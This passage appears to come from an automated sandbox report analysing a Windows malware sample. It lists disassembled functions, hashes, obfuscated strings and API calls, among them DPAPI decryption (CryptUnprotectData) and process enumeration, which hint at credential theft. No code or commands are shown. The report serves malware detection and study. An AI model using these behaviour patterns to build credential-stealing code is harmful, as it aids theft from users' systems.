                            • Opcode Fuzzy Hash: 1ec64974d77e2758eb17665d1e23032acd0e1bec273bda7d85c5425959937157
                            • Instruction Fuzzy Hash: F1B249F360C2049FE304AE2DEC8567BBBE6EB94320F16463DE6C4C7744EA7598058697
                            Function 0111DBE6 Relevance: 9.2, Strings: 6, Instructions: 1656COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: =1v]$d;$$em}$f|Wk$z$~'$5s
                            • API String ID: 0-3393998685
                            • Opcode ID: 9495eee6fc0ac9b9eb2885b3a47ee5846d813653f638125b055a07de54bf4f50
                            • Instruction ID: 20c69f245880632fc63a89a94a4207fe391a479f9190878085002cfdceee1860
                            • Opcode Fuzzy Hash: 9495eee6fc0ac9b9eb2885b3a47ee5846d813653f638125b055a07de54bf4f50
                            • Instruction Fuzzy Hash: 56B208F360C2049FE304AE2DEC8567AF7D9EF94620F1A463DEAC5C7744EA3598018696
                            Function 0111A6AB Relevance: 9.2, Strings: 6, Instructions: 1654COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: .5c}$9jw$E{_y$cj{_$giJ$pXv
                            • API String ID: 0-3838268587
                            • Opcode ID: 6d1abc04efd3a116c379cc4f3269d28032aac32cf1d7c1a43dfe6cec56484310
                            • Instruction ID: 0910f37ec9ef7d3d965c481c7afb7390c9e6e6c87c7aebc529b6f52e0dbbc4c2
                            • Opcode Fuzzy Hash: 6d1abc04efd3a116c379cc4f3269d28032aac32cf1d7c1a43dfe6cec56484310
                            • Instruction Fuzzy Hash: E9B2F7F3A086049FE304AE2DDC8567AF7E6EFD4720F1A893DE6C487744EA3558018697
                            Function 011263A8 Relevance: 9.0, Strings: 6, Instructions: 1527COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: !4e-$-5V1$?v?$[T}}$v%v?$%ww
                            • API String ID: 0-2688252102
                            • Opcode ID: fe3aabe72e5a815891d870929d38822ce86cf07e70e6c21fee89d0cc540707a9
                            • Instruction ID: 82af2bd1a9dc893e24072952579f6faad62f53bb3b9a465d528d092863dd810b
                            • Opcode Fuzzy Hash: fe3aabe72e5a815891d870929d38822ce86cf07e70e6c21fee89d0cc540707a9
                            • Instruction Fuzzy Hash: B0A2D6F3A0C6109FE304AE2DEC8567AFBE5EF94720F16492DEAC4C7744EA3558418792
                            Function 00D82C10 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46memorytimeCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00D82C42
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00D82C49
                            • GetTimeZoneInformation.KERNEL32(?), ref: 00D82C58
                            • wsprintfA.USER32 ref: 00D82C83
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                            • String ID: wwww
                            • API String ID: 3317088062-671953474
                            • Opcode ID: 7164ce69d9da6b4fe4e133d9780de2d590bc31f3d1f161b0e4a52ab74a0d1628
                            • Instruction ID: 3e4873836cd230e60a722d195f436cef038eb3b6f19ac11c03cea3cf1c86b291
                            • Opcode Fuzzy Hash: 7164ce69d9da6b4fe4e133d9780de2d590bc31f3d1f161b0e4a52ab74a0d1628
                            • Instruction Fuzzy Hash: 4901F771A04608ABDB289B6DDC4AB69BB69EB85721F00432AF915D72D0D7B4190487E1
                            Function 01129D13 Relevance: 8.7, Strings: 6, Instructions: 1216COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: "^D7$3Vo_$D>?$GvU$PW$E_
                            • API String ID: 0-590295921
                            • Opcode ID: 820106d66245bd41b3da293bb1590d21efb159ec350612a2aeb6221b6787f5d6
                            • Instruction ID: b737d478d799e4440d0c94ce7a01f7c5ed73392bdd6e79633ce424f9f7f5e4c8
                            • Opcode Fuzzy Hash: 820106d66245bd41b3da293bb1590d21efb159ec350612a2aeb6221b6787f5d6
                            • Instruction Fuzzy Hash: FE8228F360C2049FE704AE2DEC8567ABBE9EFD4720F1A863DE6C4C3744E93558058696
                            Function 0112CE28 Relevance: 7.9, Strings: 5, Instructions: 1617COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: &o~$3#v$CZ{u$J+n?$r!(
                            • API String ID: 0-1822108732
                            • Opcode ID: 1ff4e59151eee3dfd99bcb44bcabea297d48129b2d673fd2f66894d603b72a08
                            • Instruction ID: 49d0a0a35d4f4119cfa041e577c9eebeea2e09c009edc174e35eece883f415f0
                            • Opcode Fuzzy Hash: 1ff4e59151eee3dfd99bcb44bcabea297d48129b2d673fd2f66894d603b72a08
                            • Instruction Fuzzy Hash: 76B2F5F3A0C2109FE304AE29EC8567AFBE9EF94720F16493DE6C4C7744E63558058697
                            Function 00D67750 Relevance: 7.6, APIs: 5, Instructions: 52memoryencryptionCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00D6775E
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00D67765
                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00D6778D
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 00D677AD
                            • LocalFree.KERNEL32(?), ref: 00D677B7
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                            • String ID:
                            • API String ID: 2609814428-0
                            • Opcode ID: d64c5765cb6a0e40a33b94bf2470dfddb34cb58787712584b0824ba281c4dbd5
                            • Instruction ID: 63fb19834b6cc34fcd98983550d0e12bad1541b2de54238b91bc16711f9a99eb
                            • Opcode Fuzzy Hash: d64c5765cb6a0e40a33b94bf2470dfddb34cb58787712584b0824ba281c4dbd5
                            • Instruction Fuzzy Hash: 5F015275B44308BBEB10DBA89C0AFAA7778EB44B14F004149FB08EA2D0D6B0990087A0
                            Function 0111C1BE Relevance: 6.6, Strings: 4, Instructions: 1611COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: +^B~$F3yo$ir;$+}
                            • API String ID: 0-2380019094
                            • Opcode ID: ec0494b4bef41d3519bfe6482ae122b0b57fbdb930c9e247ee04a5a30bc797a1
                            • Instruction ID: 24c6a48071c54bbc00f634eb9de68070278be400c446be4d280bec64c334398a
                            • Opcode Fuzzy Hash: ec0494b4bef41d3519bfe6482ae122b0b57fbdb930c9e247ee04a5a30bc797a1
                            • Instruction Fuzzy Hash: D4B2E4F360C2049FE308AE2DEC8567AFBE9EB94720F16493DE6C5C3744EA7558048697
                            Function 00D83A50 Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00D871E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 00D871FE
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00D83A96
                            • Process32First.KERNEL32(00000000,00000128), ref: 00D83AA9
                            • Process32Next.KERNEL32(00000000,00000128), ref: 00D83ABF
                              • Part of subcall function 00D87310: lstrlen.KERNEL32(------,00D65BEB), ref: 00D8731B
                              • Part of subcall function 00D87310: lstrcpy.KERNEL32(00000000), ref: 00D8733F
                              • Part of subcall function 00D87310: lstrcat.KERNEL32(?,------), ref: 00D87349
                              • Part of subcall function 00D87280: lstrcpy.KERNEL32(00000000), ref: 00D872AE
                            • CloseHandle.KERNEL32(00000000), ref: 00D83BF7
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                            • String ID:
                            • API String ID: 1066202413-0
                            • Opcode ID: a5d60ed518f117d6e238d8378135b992c86b0c0978f8782e87b1b0da529a31cc
                            • Instruction ID: 66582350035e1f8f178bb8d03fca1316a6a24c66fd640da45c6f486670107eab
                            • Opcode Fuzzy Hash: a5d60ed518f117d6e238d8378135b992c86b0c0978f8782e87b1b0da529a31cc
                            • Instruction Fuzzy Hash: 4D81E670905208CFD714DF19D948B95B7B1FB44729F2AC1AED40C9B2A2D776AD82CFA0
                            Function 00D6EA30 Relevance: 6.1, APIs: 4, Instructions: 98stringencryptionCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlen.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 00D6EA76
                            • CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 00D6EA7E
                            • lstrcat.KERNEL32(00D8CFEC,00D8CFEC), ref: 00D6EB27
                            • lstrcat.KERNEL32(00D8CFEC,00D8CFEC), ref: 00D6EB49
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$BinaryCryptStringlstrlen
                            • String ID:
                            • API String ID: 189259977-0
                            • Opcode ID: 88b49c4382628c6740c0634f8b750a9e6a01a0ab29cdddaed4ca0cadc1b6eafa
                            • Instruction ID: 30c46eba582ff52dc2b8f4254192e6ccd24553f30f0f5670c8a16f06d99ddec9
                            • Opcode Fuzzy Hash: 88b49c4382628c6740c0634f8b750a9e6a01a0ab29cdddaed4ca0cadc1b6eafa
                            • Instruction Fuzzy Hash: 2D310475A1411CABEB10EB98EC45FEFB77DDF44705F04416AFA09E6240DBB15A088BB2
                            Function 00D840B0 Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON
                            Download Yara Rule
                            APIs
                            • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 00D840CD
                            • GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 00D840DC
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00D840E3
                            • CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 00D84113
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
